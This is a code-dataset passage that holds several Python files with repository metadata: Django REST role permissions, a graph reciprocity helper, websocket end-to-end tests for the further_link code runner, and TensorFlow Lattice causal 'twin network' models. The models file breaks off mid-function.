| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
68fcbc0ec22689b63906da7a3c560b132c171c8e
| 680
|
py
|
Python
|
backend/permissions.py
|
saad4software/MMSS-Backend
|
fddb2ff94eab905df321dd0ce574b7ae787f067d
|
[
"Apache-2.0"
] | null | null | null |
backend/permissions.py
|
saad4software/MMSS-Backend
|
fddb2ff94eab905df321dd0ce574b7ae787f067d
|
[
"Apache-2.0"
] | null | null | null |
backend/permissions.py
|
saad4software/MMSS-Backend
|
fddb2ff94eab905df321dd0ce574b7ae787f067d
|
[
"Apache-2.0"
] | null | null | null |
from rest_framework import permissions
from .models import User
class IsCounter(permissions.BasePermission):
def has_permission(self, request, view):
return hasattr(request.user, 'role') and \
(request.user.role == 'C' or request.user.role == 'A')
class IsGuest(permissions.BasePermission):
def has_permission(self, request, view):
return hasattr(request.user, 'role') and \
(request.user.role == 'G' or request.user.role == 'C' or request.user.role == 'A')
class IsAdmin(permissions.BasePermission):
def has_permission(self, request, view):
return hasattr(request.user, 'role') and request.user.role == 'A'
| 34
| 97
| 0.675
| 84
| 680
| 5.416667
| 0.309524
| 0.217582
| 0.296703
| 0.204396
| 0.810989
| 0.810989
| 0.810989
| 0.810989
| 0.810989
| 0.810989
| 0
| 0
| 0.195588
| 680
| 19
| 98
| 35.789474
| 0.83181
| 0
| 0
| 0.384615
| 0
| 0
| 0.026471
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.230769
| false
| 0
| 0.153846
| 0.230769
| 0.846154
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 11
|
ec1d7aeaa0df4f31ad494082b0d15b8df033953d
| 152
|
py
|
Python
|
analysis/reciprocity.py
|
LuudJanssen/evolving-network-analysis
|
a392cbc737ca02c1ca9d033bd858dbc60e57f757
|
[
"Apache-2.0"
] | null | null | null |
analysis/reciprocity.py
|
LuudJanssen/evolving-network-analysis
|
a392cbc737ca02c1ca9d033bd858dbc60e57f757
|
[
"Apache-2.0"
] | null | null | null |
analysis/reciprocity.py
|
LuudJanssen/evolving-network-analysis
|
a392cbc737ca02c1ca9d033bd858dbc60e57f757
|
[
"Apache-2.0"
] | null | null | null |
from graph_tool.topology import edge_reciprocity
# Returns a graph's edge reciprocity
def graph_reciprocity(graph):
return edge_reciprocity(graph)
| 25.333333
| 48
| 0.822368
| 21
| 152
| 5.761905
| 0.571429
| 0.371901
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 152
| 6
| 49
| 25.333333
| 0.909774
| 0.223684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
ec301e80925b03fb1d02df4454805a482095c436
| 98
|
py
|
Python
|
pipeline/__init__.py
|
prashanthsandela/python-pipeline
|
1f6a2ea766b80dc7d4c075b90cb204591bf44981
|
[
"Apache-2.0"
] | 1
|
2021-12-28T06:43:44.000Z
|
2021-12-28T06:43:44.000Z
|
pipeline/__init__.py
|
prashanthsandela/python-pipeline
|
1f6a2ea766b80dc7d4c075b90cb204591bf44981
|
[
"Apache-2.0"
] | null | null | null |
pipeline/__init__.py
|
prashanthsandela/python-pipeline
|
1f6a2ea766b80dc7d4c075b90cb204591bf44981
|
[
"Apache-2.0"
] | null | null | null |
from pipeline.pipeline import Pipeline as Pipeline
from pipeline.pipeline import Stream as Stream
| 32.666667
| 50
| 0.857143
| 14
| 98
| 6
| 0.357143
| 0.285714
| 0.47619
| 0.619048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122449
| 98
| 2
| 51
| 49
| 0.976744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ec438070869d44f0676c75f3767ae905b194a591
| 13,899
|
py
|
Python
|
tests/e2e/test_run_py.py
|
pi-top/Further-Link
|
9356fa719ee706fce68859c82ab89694f2497975
|
[
"Apache-2.0"
] | null | null | null |
tests/e2e/test_run_py.py
|
pi-top/Further-Link
|
9356fa719ee706fce68859c82ab89694f2497975
|
[
"Apache-2.0"
] | 20
|
2021-08-11T19:08:59.000Z
|
2022-03-21T20:14:41.000Z
|
tests/e2e/test_run_py.py
|
pi-top/pt-further-link
|
9356fa719ee706fce68859c82ab89694f2497975
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import os
from datetime import datetime
from shutil import copy
import aiohttp
import pytest
from further_link import __version__
from further_link.util.message import create_message, parse_message
from ..dirs import WORKING_DIRECTORY
from . import E2E_PATH, RUN_PY_URL
from .helpers import receive_data, wait_for_data
@pytest.mark.asyncio
async def test_bad_message(run_py_ws_client):
start_cmd = create_message("start")
await run_py_ws_client.send_str(start_cmd)
await wait_for_data(run_py_ws_client, "error", "message", "Bad message")
@pytest.mark.asyncio
async def test_run_code_script(run_py_ws_client):
code = """\
from datetime import datetime
print(datetime.now().strftime("%A"))
"""
start_cmd = create_message("start", {"sourceScript": code})
await run_py_ws_client.send_str(start_cmd)
await receive_data(run_py_ws_client, "started")
day = datetime.now().strftime("%A")
await wait_for_data(run_py_ws_client, "stdout", "output", day + "\n")
await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
async def test_run_code_script_with_directory(run_py_ws_client):
code = """\
from datetime import datetime
print(datetime.now().strftime("%A"))
"""
start_cmd = create_message(
"start", {"sourceScript": code, "directoryName": "my-dirname"}
)
await run_py_ws_client.send_str(start_cmd)
await receive_data(run_py_ws_client, "started")
day = datetime.now().strftime("%A")
await wait_for_data(run_py_ws_client, "stdout", "output", day + "\n")
await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
async def test_run_code_relative_path(run_py_ws_client):
copy("{}/test_data/print_date.py".format(E2E_PATH), WORKING_DIRECTORY)
start_cmd = create_message("start", {"sourcePath": "print_date.py"})
await run_py_ws_client.send_str(start_cmd)
await receive_data(run_py_ws_client, "started")
day = datetime.now().strftime("%A")
await wait_for_data(run_py_ws_client, "stdout", "output", day + "\n")
await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
async def test_run_code_absolute_path(run_py_ws_client):
start_cmd = create_message(
"start", {"sourcePath": "{}/test_data/print_date.py".format(E2E_PATH)}
)
await run_py_ws_client.send_str(start_cmd)
await receive_data(run_py_ws_client, "started")
day = datetime.now().strftime("%A")
await wait_for_data(run_py_ws_client, "stdout", "output", day + "\n")
await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
@pytest.mark.parametrize("query_params", [{"user": "root"}])
@pytest.mark.skip(reason="Won't work in CI due to old sudo version")
async def test_run_as_user(run_py_ws_client_query):
# This test assumes non-root user with nopasswd sudo access...
code = "import getpass\nprint(getpass.getuser())"
start_cmd = create_message("start", {"sourceScript": code})
await run_py_ws_client_query.send_str(start_cmd)
await receive_data(run_py_ws_client_query, "started")
await wait_for_data(run_py_ws_client_query, "stdout", "output", "root\n")
await wait_for_data(run_py_ws_client_query, "stopped", "exitCode", 0)
@pytest.mark.asyncio
async def test_stop_early(run_py_ws_client):
code = "while True: pass"
start_cmd = create_message("start", {"sourceScript": code})
await run_py_ws_client.send_str(start_cmd)
await receive_data(run_py_ws_client, "started")
stop_cmd = create_message("stop")
await run_py_ws_client.send_str(stop_cmd)
await wait_for_data(run_py_ws_client, "stopped", "exitCode", -15)
@pytest.mark.asyncio
async def test_bad_code(run_py_ws_client):
code = "i'm not valid python"
start_cmd = create_message("start", {"sourceScript": code})
await run_py_ws_client.send_str(start_cmd)
await receive_data(run_py_ws_client, "started")
await asyncio.sleep(0.1) # wait for data
message = await run_py_ws_client.receive()
m_type, m_data, m_process = parse_message(message.data)
assert m_type == "stderr"
lines = m_data["output"].split("\n")
assert lines[0].startswith(" File")
assert lines[1] == " i'm not valid python"
assert lines[2] == " ^"
assert lines[3] == "SyntaxError: EOL while scanning string literal"
await wait_for_data(run_py_ws_client, "stopped", "exitCode", 1)
@pytest.mark.asyncio
async def test_input(run_py_ws_client):
code = """s = input()
while "BYE" != s:
print(["HUH?! SPEAK UP, SONNY!","NO, NOT SINCE 1930"][s.isupper()])
s = input()"""
start_cmd = create_message("start", {"sourceScript": code})
await run_py_ws_client.send_str(start_cmd)
await receive_data(run_py_ws_client, "started")
user_input = create_message("stdin", {"input": "hello\n"})
await run_py_ws_client.send_str(user_input)
await wait_for_data(
run_py_ws_client, "stdout", "output", "HUH?! SPEAK UP, SONNY!\n"
)
user_input = create_message("stdin", {"input": "HEY GRANDMA\n"})
await run_py_ws_client.send_str(user_input)
await wait_for_data(run_py_ws_client, "stdout", "output", "NO, NOT SINCE 1930\n")
user_input = create_message("stdin", {"input": "BYE\n"})
await run_py_ws_client.send_str(user_input)
await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
@pytest.mark.parametrize("query_params", [{"pty": "1"}])
async def test_input_pty(run_py_ws_client_query):
code = """s = input()
while "BYE" != s:
print(["HUH?! SPEAK UP, SONNY!","NO, NOT SINCE 1930"][s.isupper()])
s = input()"""
start_cmd = create_message("start", {"sourceScript": code})
await run_py_ws_client_query.send_str(start_cmd)
await receive_data(run_py_ws_client_query, "started")
user_input = create_message("stdin", {"input": "hello\r"})
await run_py_ws_client_query.send_str(user_input)
await wait_for_data(
run_py_ws_client_query,
"stdout",
"output",
"hello\r\nHUH?! SPEAK UP, SONNY!\r\n",
)
user_input = create_message("stdin", {"input": "HEY GRANDMA\r"})
await run_py_ws_client_query.send_str(user_input)
await wait_for_data(
run_py_ws_client_query,
"stdout",
"output",
"HEY GRANDMA\r\nNO, NOT SINCE 1930\r\n",
)
user_input = create_message("stdin", {"input": "BYE\r"})
await run_py_ws_client_query.send_str(user_input)
await wait_for_data(run_py_ws_client_query, "stdout", "output", "BYE\r\n")
await wait_for_data(run_py_ws_client_query, "stopped", "exitCode", 0)
@pytest.mark.asyncio
async def test_two_clients(run_py_ws_client):
async with aiohttp.ClientSession() as session2:
async with session2.ws_connect(RUN_PY_URL) as run_py_ws_client2:
code = "while True: pass"
start_cmd = create_message("start", {"sourceScript": code})
await run_py_ws_client.send_str(start_cmd)
await receive_data(run_py_ws_client, "started")
await run_py_ws_client2.send_str(start_cmd)
await receive_data(run_py_ws_client2, "started")
stop_cmd = create_message("stop")
await run_py_ws_client.send_str(stop_cmd)
await wait_for_data(run_py_ws_client, "stopped", "exitCode", -15, 100)
stop_cmd = create_message("stop")
await run_py_ws_client2.send_str(stop_cmd)
await wait_for_data(run_py_ws_client2, "stopped", "exitCode", -15, 100)
@pytest.mark.asyncio
async def test_out_of_order_commands(run_py_ws_client):
# send input
user_input = create_message("stdin", {"input": "hello\n"})
await run_py_ws_client.send_str(user_input)
# bad message
await receive_data(run_py_ws_client, "error", "message", "Bad message")
# send stop
stop_cmd = create_message("stop")
await run_py_ws_client.send_str(stop_cmd)
# bad message
await receive_data(run_py_ws_client, "error", "message", "Bad message")
# send start
code = "while True: pass"
start_cmd = create_message("start", {"sourceScript": code})
await run_py_ws_client.send_str(start_cmd)
# started
await receive_data(run_py_ws_client, "started")
# send start
start_cmd = create_message("start", {"sourceScript": code})
await run_py_ws_client.send_str(start_cmd)
# bad message
await receive_data(run_py_ws_client, "error", "message", "Bad message")
# send stop
stop_cmd = create_message("stop")
await run_py_ws_client.send_str(stop_cmd)
# stopped
await wait_for_data(run_py_ws_client, "stopped", "exitCode", -15)
# send stop
stop_cmd = create_message("stop")
await run_py_ws_client.send_str(stop_cmd)
# bad message
await receive_data(run_py_ws_client, "error", "message", "Bad message")
@pytest.mark.asyncio
async def test_discard_old_input(run_py_ws_client):
code = 'print("hello world")'
start_cmd = create_message("start", {"sourceScript": code})
await run_py_ws_client.send_str(start_cmd)
await receive_data(run_py_ws_client, "started")
unterminated_input = create_message("stdin", {"input": "unterminated input"})
await run_py_ws_client.send_str(unterminated_input)
await wait_for_data(run_py_ws_client, "stdout", "output", "hello world\n", 100)
await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
code = "print(input())"
start_cmd = create_message("start", {"sourceScript": code})
await run_py_ws_client.send_str(start_cmd)
await receive_data(run_py_ws_client, "started")
user_input = create_message("stdin", {"input": "hello\n"})
await run_py_ws_client.send_str(user_input)
await wait_for_data(run_py_ws_client, "stdout", "output", "hello\n")
await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
async def test_use_lib(run_py_ws_client):
code = """\
from further_link import __version__
print(__version__)
"""
start_cmd = create_message("start", {"sourceScript": code})
await run_py_ws_client.send_str(start_cmd)
await receive_data(run_py_ws_client, "started")
await wait_for_data(run_py_ws_client, "stdout", "output", f"{__version__}\n")
await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
@pytest.mark.skipif("DISPLAY" not in os.environ, reason="requires UI")
async def test_use_display(run_py_ws_client):
code = """\
from turtle import color
color('red')
"""
start_cmd = create_message("start", {"sourceScript": code})
await run_py_ws_client.send_str(start_cmd)
await receive_data(run_py_ws_client, "started")
await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0, 5000)
@pytest.mark.asyncio
@pytest.mark.skip(reason="Temporarily disabled - to be fixed")
async def test_keyevent(run_py_ws_client):
code = """\
from further_link import KeyboardButton
from signal import pause
a = KeyboardButton('a')
b = KeyboardButton('b')
a.when_pressed = lambda: print('a pressed')
b.when_released = lambda: print('b released')
pause()
"""
start_cmd = create_message("start", {"sourceScript": code})
await run_py_ws_client.send_str(start_cmd)
await wait_for_data(run_py_ws_client, "started")
await wait_for_data(run_py_ws_client, "keylisten", "output", "a")
await wait_for_data(run_py_ws_client, "keylisten", "output", "b")
await run_py_ws_client.send_str(
create_message("keyevent", {"key": "a", "event": "keydown"})
)
await wait_for_data(run_py_ws_client, "stdout", "output", "a pressed\n")
await run_py_ws_client.send_str(
create_message("keyevent", {"key": "b", "event": "keyup"})
)
await wait_for_data(run_py_ws_client, "stdout", "output", "b released\n")
await run_py_ws_client.send_str(create_message("stop"))
await wait_for_data(run_py_ws_client, "stopped", "exitCode", -15)
jpeg_pixel_b64 = "/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/wAALCAABAAEBAREA/8QAFAABAAAAAAAAAAAAAAAAAAAAAP/EABQQAQAAAAAAAAAAAAAAAAAAAAD/2gAIAQEAAD8AP//Z" # noqa: E501
@pytest.mark.asyncio
async def test_send_image_pil(run_py_ws_client):
code = """\
from further_link import send_image
from PIL.Image import effect_noise
send_image(effect_noise((1, 1), 0))
"""
start_cmd = create_message("start", {"sourceScript": code})
await run_py_ws_client.send_str(start_cmd)
await wait_for_data(run_py_ws_client, "started")
await wait_for_data(run_py_ws_client, "video", "output", jpeg_pixel_b64)
await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
async def test_send_image_opencv(run_py_ws_client):
code = """\
from numpy import array
from further_link import send_image
from PIL.Image import effect_noise
send_image(array(effect_noise((1, 1), 0)))
"""
start_cmd = create_message("start", {"sourceScript": code})
await run_py_ws_client.send_str(start_cmd)
await wait_for_data(run_py_ws_client, "started")
await wait_for_data(run_py_ws_client, "video", "output", jpeg_pixel_b64)
await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
async def test_send_image_with_directory(run_py_ws_client):
code = """\
from further_link import send_image
from PIL.Image import effect_noise
send_image(effect_noise((1, 1), 0))
"""
start_cmd = create_message(
"start", {"sourceScript": code, "directoryName": "my-dirname"}
)
await run_py_ws_client.send_str(start_cmd)
await wait_for_data(run_py_ws_client, "started")
await wait_for_data(run_py_ws_client, "video", "output", jpeg_pixel_b64)
await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
| 31.951724
| 245
| 0.714296
| 2,055
| 13,899
| 4.451582
| 0.098783
| 0.069961
| 0.096415
| 0.17195
| 0.815369
| 0.787167
| 0.766834
| 0.75481
| 0.724749
| 0.692392
| 0
| 0.008811
| 0.158932
| 13,899
| 434
| 246
| 32.025346
| 0.773738
| 0.015253
| 0
| 0.641379
| 0
| 0
| 0.244166
| 0.033355
| 0
| 0
| 0
| 0
| 0.017241
| 1
| 0
| false
| 0.013793
| 0.086207
| 0
| 0.086207
| 0.044828
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ec4e9fa5845ea23660b46a4add4fc01ccec47886
| 21,974
|
py
|
Python
|
Kenyan_train/models_kenyan.py
|
thanosvlo/Twin_Causal_Nets
|
414e36467b610e210bf7ab3aa325d48d3d920303
|
[
"MIT"
] | 3
|
2022-02-01T15:23:27.000Z
|
2022-03-21T15:16:35.000Z
|
Kenyan_train/models_kenyan.py
|
thanosvlo/Twin_Causal_Nets
|
414e36467b610e210bf7ab3aa325d48d3d920303
|
[
"MIT"
] | null | null | null |
Kenyan_train/models_kenyan.py
|
thanosvlo/Twin_Causal_Nets
|
414e36467b610e210bf7ab3aa325d48d3d920303
|
[
"MIT"
] | null | null | null |
import sys
sys.path.append("..")
sys.path.append("../..")
import numpy as np
import tensorflow as tf
import tensorflow_lattice as tfl
def make_calibrators(data, lattice_size, units, name=None, monotonicity='none'):
try:
min_ = data.min()
max_ = data.max()
except:
min_ = 0
max_ = 1
if data == 'Uy': max_ = 2
calibrator = tfl.layers.PWLCalibration(
# Easiest way to specify them is to uniformly cover entire input range by using numpy.linspace().
# For Categorical Variables see tfl.layers.CategoricalCalibration.
input_keypoints=np.linspace(
min_, max_, num=5),
dtype=tf.float32,
monotonicity=monotonicity,
units=units,
# Output range must correspond to expected lattice input range.
output_min=0.0,
output_max=lattice_size - 1.0,
name=name
)
return calibrator
def make_multiple_calibrators(confounders, params):
model_inputs = []
lattice_inputs = []
i = 2
if 'c13_c_child_gender' in confounders:
gender_input = tf.keras.layers.Input(shape=[1], name='c13_c_child_gender')
model_inputs.append(gender_input)
gender_calibrator = tfl.layers.CategoricalCalibration(
num_buckets=2,
output_min=0.0,
output_max=params.lattice_sizes[i] - 1.0,
# Initializes all outputs to (output_min + output_max) / 2.0.
kernel_initializer='constant',
name='gender_calib',
)(gender_input)
i += 1
lattice_inputs.append(gender_calibrator)
if 'base_age' in confounders:
age_input = tf.keras.layers.Input(shape=[1], name='base_age')
model_inputs.append(age_input)
age_calib = make_calibrators(confounders['base_age'].values, params.lattice_sizes[i], params.z_calib_units,
monotonicity=params.z_monotonicity[i - 2],
name='age_calib')(age_input)
i += 1
lattice_inputs.append(age_calib)
if 'momeduc_orig' in confounders:
momed_input = tf.keras.layers.Input(shape=[1], name='momeduc_orig')
model_inputs.append(momed_input)
momed_calib = make_calibrators(confounders['momeduc_orig'].values, params.lattice_sizes[i],
params.z_calib_units,
monotonicity=params.z_monotonicity[i - 2], name='momeduc_calib', )(momed_input)
i += 1
lattice_inputs.append(momed_calib)
if 'splnecmpn_base' in confounders:
splnecmpn_base_input = tf.keras.layers.Input(shape=[1], name='splnecmpn_base')
model_inputs.append(splnecmpn_base_input)
splnecmpn_base_calib = make_calibrators(confounders['splnecmpn_base'].values, params.lattice_sizes[i],
params.z_calib_units,
monotonicity=params.z_monotonicity[i - 2], name='splnecmpn_base_calib')(
splnecmpn_base_input)
i += 1
lattice_inputs.append(splnecmpn_base_calib)
if 'e1_iron_roof_base' in confounders:
e1_iron_roof_base_input = tf.keras.layers.Input(shape=[1], name='e1_iron_roof_base')
model_inputs.append(e1_iron_roof_base_input)
e1_iron_roof_base_calib = make_calibrators(confounders['e1_iron_roof_base'].values, params.lattice_sizes[i],
params.z_calib_units,
monotonicity=params.z_monotonicity[i - 2],
name='e1_iron_roof_base_calib')(e1_iron_roof_base_input)
i += 1
lattice_inputs.append(e1_iron_roof_base_calib)
if 'hygiene_know_base' in confounders:
hygiene_know_base_input = tf.keras.layers.Input(shape=[1], name='hygiene_know_base')
model_inputs.append(hygiene_know_base_input)
hygiene_know_base_calib = make_calibrators(confounders['hygiene_know_base'].values, params.lattice_sizes[i],
params.z_calib_units,
monotonicity=params.z_monotonicity[i - 2],
name='hygiene_know_base_calib')(hygiene_know_base_input)
i += 1
lattice_inputs.append(hygiene_know_base_calib)
if 'latrine_density_base' in confounders:
latrine_density_base_input = tf.keras.layers.Input(shape=[1], name='latrine_density_base')
model_inputs.append(latrine_density_base_input)
latrine_density_base_calib = make_calibrators(confounders['latrine_density_base'].values,
params.lattice_sizes[i],
params.z_calib_units,
monotonicity=params.z_monotonicity[i - 2],
name='latrine_density_base_calib')(latrine_density_base_input)
i += 1
lattice_inputs.append(latrine_density_base_calib)
if 'numkids_base' in confounders:
numkids_base_input = tf.keras.layers.Input(shape=[1], name='numkids_base')
model_inputs.append(numkids_base_input)
numkids_base_calib = make_calibrators(confounders['numkids_base'].values, params.lattice_sizes[i],
params.z_calib_units,
monotonicity=params.z_monotonicity[i - 2], name='numkids_base_calib')(
numkids_base_input)
i += 1
lattice_inputs.append(numkids_base_calib)
return model_inputs, lattice_inputs
def Single_Twin_Net_Kenyan(treatment, uy, confounders, params):
lattice_sizes = params.lattice_sizes
model_inputs = []
lattice_inputs = []
a_input = tf.keras.layers.Input(shape=[1], name='A')
model_inputs.append(a_input)
a_calibrator = make_calibrators(treatment.values, lattice_sizes[0], params.calib_units, monotonicity='increasing',
name='a_calib')(a_input)
lattice_inputs.append(a_calibrator)
uy_input = tf.keras.layers.Input(shape=[1], name='Uy')
model_inputs.append(uy_input)
uy_calibrator = make_calibrators(uy, lattice_sizes[1], params.hidden_dims, monotonicity=params.uy_monotonicity
, name='uy_name')(uy_input)
lattice_inputs.append(uy_calibrator)
if params.multiple_confounders:
inputs_, z_calibrator = make_multiple_calibrators(confounders, params)
_ = [model_inputs.append(i) for i in inputs_]
layer_z = z_calibrator
else:
confounders = confounders.values
z_input = tf.keras.layers.Input(shape=(params.len_conf,), name='Z')
model_inputs.append(z_input)
z_calibrator = make_calibrators(confounders, lattice_sizes[2], params.z_calib_units,
monotonicity=params.z_monotonicity[0])(z_input)
z_calibrator = [z_calibrator]
# Z layer
if params.z_layer == 'linear':
z_calibrator = tf.tile(z_calibrator[..., tf.newaxis], (1, 1, params.z_calib_units))
layer_z = tfl.layers.Linear(params.z_calib_units, units=params.z_calib_units,
)(z_calibrator)
layer_z = [layer_z]
else:
layer_z = z_calibrator
# Uy layer
if params.uy_layer == 'linear':
layer_uy = tfl.layers.Linear(1, units=params.calib_units, monotonicities=params.uy_monotonicity)(uy_calibrator)
else:
layer_uy = uy_calibrator
lattice_y = tfl.layers.Lattice(
lattice_sizes=lattice_sizes,
units=params.lattice_units,
monotonicities=[
'increasing', params.uy_monotonicity, *params.z_monotonicity
],
output_min=0.0,
output_max=1.0,
name='Y',
)([a_calibrator, layer_uy, *layer_z])
if params.end_activation == 'calib':
lattice_y = tfl.layers.PWLCalibration(
input_keypoints=np.linspace(0.0, 1.0, 5),
name='output_calib',
)(
lattice_y)
elif params.end_activation == 'softmax':
lattice_y = tf.keras.layers.Softmax()(lattice_y)
model = tf.keras.models.Model(
inputs=model_inputs,
outputs=lattice_y)
return model
def Twin_Net_Kenyan(treatment, uy, confounders, params):
lattice_sizes = params.lattice_sizes
model_inputs = []
a_input = tf.keras.layers.Input(shape=[1], name='A')
model_inputs.append(a_input)
a_calibrator = make_calibrators(treatment.values, lattice_sizes[0], params.calib_units, monotonicity='increasing',
name='a_calib')(a_input)
a_prime_input = tf.keras.layers.Input(shape=[1], name='A_prime')
model_inputs.append(a_prime_input)
a_prime_calibrator = make_calibrators(treatment.values, lattice_sizes[0], params.calib_units,
monotonicity='increasing',
name='a_prime_calib')(a_prime_input)
uy_input = tf.keras.layers.Input(shape=[1], name='Uy')
model_inputs.append(uy_input)
uy_calibrator = make_calibrators(uy, lattice_sizes[1], params.hidden_dims, monotonicity=params.uy_monotonicity
, name='uy_name')(uy_input)
if params.multiple_confounders:
inputs_, z_calibrator = make_multiple_calibrators(confounders, params)
_ = [model_inputs.append(i) for i in inputs_]
layer_z = z_calibrator
else:
confounders = confounders.values
z_input = tf.keras.layers.Input(shape=(params.len_conf,), name='Z')
model_inputs.append(z_input)
z_calibrator = make_calibrators(confounders, lattice_sizes[2], params.z_calib_units,
monotonicity=params.z_monotonicity[0])(z_input)
z_calibrator = [z_calibrator]
# Z layer
if params.z_layer == 'linear':
z_calibrator = tf.tile(z_calibrator[..., tf.newaxis], (1, 1, params.z_calib_units))
layer_z = tfl.layers.Linear(params.z_calib_units, units=params.z_calib_units,
)(z_calibrator)
layer_z = [layer_z]
else:
layer_z = z_calibrator
# Uy layer
if params.uy_layer == 'linear':
layer_uy = tfl.layers.Linear(1, units=params.calib_units, monotonicities=params.uy_monotonicity)(uy_calibrator)
else:
layer_uy = uy_calibrator
if params.layer =='lattice':
lattice_y = tfl.layers.Lattice(
lattice_sizes=lattice_sizes,
units=params.lattice_units,
monotonicities=[
'increasing', params.uy_monotonicity, *params.z_monotonicity
],
output_min=0.0,
output_max=1.0,
name='Y',
)([a_calibrator, layer_uy, *layer_z])
lattice_y_prime = tfl.layers.Lattice(
lattice_sizes=lattice_sizes,
units=params.lattice_units,
monotonicities=[
'increasing', params.uy_monotonicity, *params.z_monotonicity
],
output_min=0.0,
output_max=1.0,
name='Y_prime',
)([a_prime_calibrator, layer_uy, *layer_z])
else:
conc_input = tf.keras.layers.Concatenate(axis=1)([a_calibrator, layer_uy, *layer_z])
conc_input_prime = tf.keras.layers.Concatenate(axis=1)([a_prime_calibrator, layer_uy, *layer_z])
lattice_y = tfl.layers.Linear(
np.sum([i.shape[-1] for i in layer_z]) + lattice_sizes[0] +lattice_sizes[1] ,
units=params.lattice_units,
monotonicities=
'increasing'
,
name='Y',
)(conc_input)
lattice_y_prime = tfl.layers.Linear(
np.sum([i.shape[-1] for i in layer_z]) + lattice_sizes[0] +lattice_sizes[1] ,
units=params.lattice_units,
monotonicities=
'increasing'
,
name='Y_prime',
)(conc_input_prime)
if params.end_activation == 'calib':
lattice_y = tfl.layers.PWLCalibration(
input_keypoints=np.linspace(0.0, 1.0, 5),
name='output_calib',
)(
lattice_y)
elif params.end_activation == 'softmax':
lattice_y = tf.keras.layers.Softmax()(lattice_y)
elif params.end_activation == 'sigmoid':
lattice_y = tf.nn.sigmoid(lattice_y)
lattice_y_prime = tf.nn.sigmoid(lattice_y_prime)
model = tf.keras.models.Model(
inputs=model_inputs,
outputs=[lattice_y, lattice_y_prime])
return model
def dice_loss(y_true, y_pred):
y_true = tf.cast(y_true, tf.float32)
y_pred = tf.math.sigmoid(y_pred)
numerator = 2 * tf.reduce_sum(y_true * y_pred)
denominator = tf.reduce_sum(y_true + y_pred)
return 1 - numerator / denominator
def Twin_Net_Kenyan_with_Propensity(treatment, uy, confounders, params):
lattice_sizes = params.lattice_sizes
model_inputs = []
a_input = tf.keras.layers.Input(shape=[1], name='A')
model_inputs.append(a_input)
a_calibrator = make_calibrators(treatment.values, lattice_sizes[0], params.calib_units, monotonicity='increasing',
name='a_calib')(a_input)
a_prime_input = tf.keras.layers.Input(shape=[1], name='A_prime')
model_inputs.append(a_prime_input)
a_prime_calibrator = make_calibrators(treatment.values, lattice_sizes[0], params.calib_units,
monotonicity='increasing',
name='a_prime_calib')(a_prime_input)
uy_input = tf.keras.layers.Input(shape=[1], name='Uy')
model_inputs.append(uy_input)
uy_calibrator = make_calibrators(uy, lattice_sizes[1], params.hidden_dims, monotonicity=params.uy_monotonicity
, name='uy_name')(uy_input)
if params.multiple_confounders:
inputs_, z_calibrator = make_multiple_calibrators(confounders, params)
_ = [model_inputs.append(i) for i in inputs_]
layer_z = z_calibrator
else:
confounders = confounders.values
z_input = tf.keras.layers.Input(shape=(params.len_conf,), name='Z')
model_inputs.append(z_input)
z_calibrator = make_calibrators(confounders, lattice_sizes[2], params.z_calib_units,
monotonicity=params.z_monotonicity[0])(z_input)
z_calibrator = [z_calibrator]
# Z layer
if params.z_layer == 'linear':
z_calibrator = tf.tile(z_calibrator[..., tf.newaxis], (1, 1, params.z_calib_units))
layer_z = tfl.layers.Linear(params.z_calib_units, units=params.z_calib_units,
)(z_calibrator)
layer_z = [layer_z]
else:
layer_z = z_calibrator
# Uy layer
